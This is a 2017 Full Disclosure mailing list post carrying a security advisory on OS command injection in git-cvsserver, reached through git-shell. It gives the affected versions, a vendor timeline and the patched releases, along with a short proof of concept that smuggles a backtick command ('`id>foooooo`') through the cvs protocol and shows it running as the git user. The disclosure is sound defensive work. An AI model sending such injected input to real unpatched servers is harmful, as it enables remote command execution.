'[FD] Advisory: Git cvsserver OS Command Injection'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Advisory: Git cvsserver OS Command Injection
From:       joernchen <joernchen () phenoelit ! de>
Date:       2017-09-26 9:03:49
Message-ID: 20170926090349.f5rwmd7be3tu2qad () refracta
[Download RAW message or body]

Hi,

see attached advisory.

Cheers,

joernchen
-- 
joernchen ~ Phenoelit
<joernchen@phenoelit.de> ~ C776 3F67 7B95 03BF 5344
http://www.phenoelit.de  ~ A46A 7199 8B7B 756A F5AC

["git_cvsserver.txt" (text/plain)]

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++--->

[ Authors ]
        joernchen       <joernchen () phenoelit de>

        Phenoelit Group (http://www.phenoelit.de)

[ Affected Products ]
        Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver)
        https://git-scm.com

[ Vendor communication ]
        2017-09-08 Sent vulnerability details to the git-security list
        2017-09-09 Acknowledgement of the issue, git maintainers ask if
                   a patch could be provided
        2017-09-10 Patch is provided
        2017-09-11 Further backtick operations are patched by the git
                   maintainers, corrections on the provided patch
        2017-09-11 Revised patch is sent out
        2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default
                   invocation from `git-shell`
        2017-09-22 Draft release for git 2.14.2 is created including the
                   fixes
        2017-09-26 Release of this advisory, release of fixed git versions

[ Description ]
	The `git` subcommand `cvsserver` is a Perl script which makes excessive
	use of the backtick operator to invoke `git`. Unfortunately user input
        is used within some of those invocations.

	It should be noted, that `git-cvsserver` will be invoked by `git-shell`
        by default without further configuration.

[ Example ]
	Below a example of a OS Command Injection within `git-cvsserver`
        triggered via `git-shell`:

        =====8<=====
[git@host ~]$ cat .ssh/authorized_keys
command="git-shell -c \"$SSH_ORIGINAL_COMMAND\"" ssh-rsa AAAAB3NzaC ....

[joernchen@host ~]$ ssh git@localhost cvs server
Root /tmp
E /tmp/ does not seem to be a valid GIT repository
E
error 1 /tmp/ is not a valid repository
Directory .
`id>foooooo`
add
fatal: Not a git repository: '/tmp/'
Invalid module '`id>foooooo`' at /usr/lib/git-core/git-cvsserver line 3807, <STDIN> line 4.
[joernchen@host ~]$

[git@host ~]$ cat foooooo
uid=619(git) gid=618(git) groups=618(git)
[git@host ~]$
        =====>8=====

[ Solution ]
        Upgrade to one of the following git versions:
        * 2.14.2
        * 2.13.6
        * 2.12.5
        * 2.11.4
        * 2.10.5

[ end of file ]

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 